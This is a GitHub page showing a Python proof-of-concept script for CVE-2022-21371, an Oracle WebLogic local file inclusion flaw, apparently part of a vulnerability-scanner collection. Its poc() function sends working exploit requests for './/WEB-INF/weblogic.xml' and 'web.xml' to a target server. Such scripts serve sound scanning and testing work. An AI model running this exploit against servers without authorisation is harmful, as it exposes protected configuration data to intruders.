-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2022-21371.py
70 lines (56 loc) · 2.26 KB
/
CVE-2022-21371.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Oracle WebLogic Server Local File Inclusion''',
"description": '''An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.''',
"severity": "high",
"references": [
"https://www.oracle.com/security-alerts/cpujan2022.html",
"https://nvd.nist.gov/vuln/detail/CVE-2022-21371",
"https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss-score": "7.5",
"cve-id": "CVE-2022-21371",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2022", "lfi", "weblogic", "oracle"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
paths = [
".//WEB-INF/weblogic.xml",
".//WEB-INF/web.xml"
]
for path in paths:
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and (("<web-app" in resp.text and "</web-app>" in resp.text) or ("<weblogic-web-app" in resp.text and "</weblogic-web-app>" in resp.text)) and ("text/xml" in str(resp.headers) or "application/xml" in str(resp.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
return result
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url